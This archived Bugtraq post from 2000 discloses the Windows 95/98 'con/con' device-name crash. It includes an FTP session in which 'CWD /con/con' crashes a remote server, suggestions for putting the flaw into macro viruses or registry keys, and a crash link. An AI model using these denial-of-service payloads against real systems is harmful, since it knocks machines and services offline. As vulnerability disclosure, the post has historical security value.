Bugtraq mailing list archives
con\con is a old thing (anyway is cool)
From: labs () USSRBACK COM (Ussr Labs)
Date: Mon, 6 Mar 2000 14:46:44 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- - ---- New exploit found by the securax crew on 3/3/error for: windoze 98 maybe 95 too... not for NT4 or win2K When we looked at the new exploit for ie that uses the image c:/con/con (http://www.zoomnet.net/~quick/error/crash.html) we experimented a bit with that unexisting path. We found that any program in windows 98 will crash if you try to open that file. eg: try Start --> run --> c:/con/con or open in Word the non-existing document c:/con/con both attempts will result in en Blues Screen of death and a lockup. This can also be exploited to crash remote servers Look what we tryed on this servU-FTP v 2.4a (works on any windoze 98 FTP even with anonyous or guest account) it looked something like this: 230 user logged in, proceed SYST 215 UNIX TYPE:L8 connect ok! PWD 257 "c:/home" is current directory. haal directory op TYPE A 200 Type set to A. PORT xx.xx.xx.xx :-) 200 PORT Command succesful LIST 150 Opening ASCII mode data connect Download: 86 bytes Wacht op de server 226 transfer complete CDUP 250 directory changed to /c:/ PWD 250 "/c:/" is current directory CWD /con/con --> this does the trick ... no more response :-) server crashed. This is probably just the beginning of a new series of exploits for windoze. this little flaw could easily be used in a macro virus. maybe even be placed in the registry HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open c:\con\con "%1" %* Da G#Df@RTER & Pathos (securax) www.securax.org - ---------------------------------------------------------------------- - ---- this is a really old thing, (good but old), we found it, like 1 year ago with the nul/nul, (now are con/con) and we found others but all with the same error overflow over Explorer.exe and VFat, windows 95 and windows 98. to anyone who want to crash the windows 9x click : here
file://c:\nul\nul<
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOMPvBNybEYfHhkiVEQKedQCfYYyh2G1TOaE5HdtXo0eNc+/K2lgAoIkt U+6L5I9uSGENV3KFuyKQ8xqu =vwMM -----END PGP SIGNATURE-----
Current thread:
- con\con is a old thing (anyway is cool) Ussr Labs (Mar 06)
- Re: con\con is a old thing (anyway is cool) Stephen White (Mar 08)
- Realplayer update pedward () WEBCOM COM (Mar 09)
- Re: con\con is a old thing (anyway is cool) Elias Levy (Mar 11)
- Re: con\con is a old thing (anyway is cool) YUFU (Mar 11)
- <Possible follow-ups>
- Re: con\con is a old thing (anyway is cool) Oliver Friedrichs (Mar 15)
- Re: con\con is a old thing (anyway is cool) Bernd Luevelsmeyer (Mar 17)
- Re: con\con is a old thing (anyway is cool) David LeBlanc (Mar 17)
- Verified PIX vulnerability to FTP-Pasv attack. monti (Mar 19)